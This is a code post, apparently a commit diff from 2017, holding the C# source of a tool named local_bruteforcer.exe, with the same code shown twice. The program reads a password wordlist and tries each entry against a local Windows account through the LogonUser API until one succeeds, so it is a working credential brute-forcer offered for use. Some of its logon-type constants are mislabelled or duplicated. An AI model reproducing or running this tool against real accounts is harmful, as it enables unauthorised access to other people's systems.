securesean · March 15, 2017 22:17
diff --git a/Program.cs b/Program.cs
 using System;
 using System.Security.Permissions;
 using System.Runtime.InteropServices;
 namespace SeanShit
 {
    public class Program
    {


        [DllImport("advapi32.dll", SetLastError = true, CharSet = CharSet.Unicode)]
        [return: MarshalAs(UnmanagedType.Bool)]
        internal static extern bool LogonUser(
            [MarshalAs(UnmanagedType.LPStr)] string pszUserName,
            [MarshalAs(UnmanagedType.LPStr)] string pszDomain,
            [MarshalAs(UnmanagedType.LPStr)] string pszPassword,
            int dwLogonType,
            int dwLogonProvider,
            ref IntPtr phToken);

        [PermissionSetAttribute(SecurityAction.Demand, Name = "FullTrust")]


        public Program() { }

        static void Main(string[] args)
        {

            if (args.Length < 2)
            {
                Console.WriteLine("local_bruteforcer.exe <username> <Password text file>");
                return;
            }

            // Read the file and display it line by line.
            int counter = 0;
            string line;
            System.IO.StreamReader file = new System.IO.StreamReader(args[1]);
            while ((line = file.ReadLine()) != null)
            {
                Console.WriteLine("Trying Password: " + line.Trim());
                if (CheckPasswordForLocalUser(args[0], line.Trim()))
                {
                    Console.WriteLine("\tPassword Found: " + line.Trim());
                    return;
                }
                counter++;
            }

            file.Close();

        }

        private static bool CheckPasswordForLocalUser(string username, string password)
        {
            IntPtr userHandle = IntPtr.Zero;

            // dwLogonProvider 
            const int LOGON32_PROVIDER_DEFAULT = 0;
            const int LOGON32_PROVIDER_WINNT50 = 1;
            const int LOGON32_PROVIDER_WINNT40 = 2;

            // dwLogonType     
            const int LOGON32_LOGON_BATCH = 0;
            const int LOGON32_LOGON_INTERACTIVE = 2;    // for some reason?
            const int LOGON32_LOGON_NETWORK = 2;
            const int LOGON32_LOGON_NETWORK_CLEARTEXT = 3;
            const int LOGON32_LOGON_NEW_CREDENTIALS = 4;
            const int LOGON32_LOGON_SERVICE = 5;
            const int LOGON32_LOGON_UNLOCK = 6;


            string domain = Environment.MachineName;

            try
            {

                bool loggedOn = LogonUser(username,
                    domain,
                    password,
                    LOGON32_LOGON_INTERACTIVE,
                    LOGON32_PROVIDER_DEFAULT,
                    ref userHandle);

                return loggedOn;
            }
            catch (Exception ex)
            {
                Console.WriteLine("Exception: " + ex.Message);
                return false;
            }
        }
    }
 }
	using System;
	using System.Security.Permissions;
	using System.Runtime.InteropServices;
	namespace SeanShit
	{
	public class Program
	{


	[DllImport("advapi32.dll", SetLastError = true, CharSet = CharSet.Unicode)]
	[return: MarshalAs(UnmanagedType.Bool)]
	internal static extern bool LogonUser(
	[MarshalAs(UnmanagedType.LPStr)] string pszUserName,
	[MarshalAs(UnmanagedType.LPStr)] string pszDomain,
	[MarshalAs(UnmanagedType.LPStr)] string pszPassword,
	int dwLogonType,
	int dwLogonProvider,
	ref IntPtr phToken);

	[PermissionSetAttribute(SecurityAction.Demand, Name = "FullTrust")]


	public Program() { }

	static void Main(string[] args)
	{

	if (args.Length < 2)
	{
	Console.WriteLine("local_bruteforcer.exe <username> <Password text file>");
	return;
	}

	// Read the file and display it line by line.
	int counter = 0;
	string line;
	System.IO.StreamReader file = new System.IO.StreamReader(args[1]);
	while ((line = file.ReadLine()) != null)
	{
	Console.WriteLine("Trying Password: " + line.Trim());
	if (CheckPasswordForLocalUser(args[0], line.Trim()))
	{
	Console.WriteLine("\tPassword Found: " + line.Trim());
	return;
	}
	counter++;
	}

	file.Close();

	}

	private static bool CheckPasswordForLocalUser(string username, string password)
	{
	IntPtr userHandle = IntPtr.Zero;

	// dwLogonProvider
	const int LOGON32_PROVIDER_DEFAULT = 0;
	const int LOGON32_PROVIDER_WINNT50 = 1;
	const int LOGON32_PROVIDER_WINNT40 = 2;

	// dwLogonType
	const int LOGON32_LOGON_BATCH = 0;
	const int LOGON32_LOGON_INTERACTIVE = 2; // for some reason?
	const int LOGON32_LOGON_NETWORK = 2;
	const int LOGON32_LOGON_NETWORK_CLEARTEXT = 3;
	const int LOGON32_LOGON_NEW_CREDENTIALS = 4;
	const int LOGON32_LOGON_SERVICE = 5;
	const int LOGON32_LOGON_UNLOCK = 6;


	string domain = Environment.MachineName;

	try
	{

	bool loggedOn = LogonUser(username,
	domain,
	password,
	LOGON32_LOGON_INTERACTIVE,
	LOGON32_PROVIDER_DEFAULT,
	ref userHandle);

	return loggedOn;
	}
	catch (Exception ex)
	{
	Console.WriteLine("Exception: " + ex.Message);
	return false;
	}
	}
	}
	}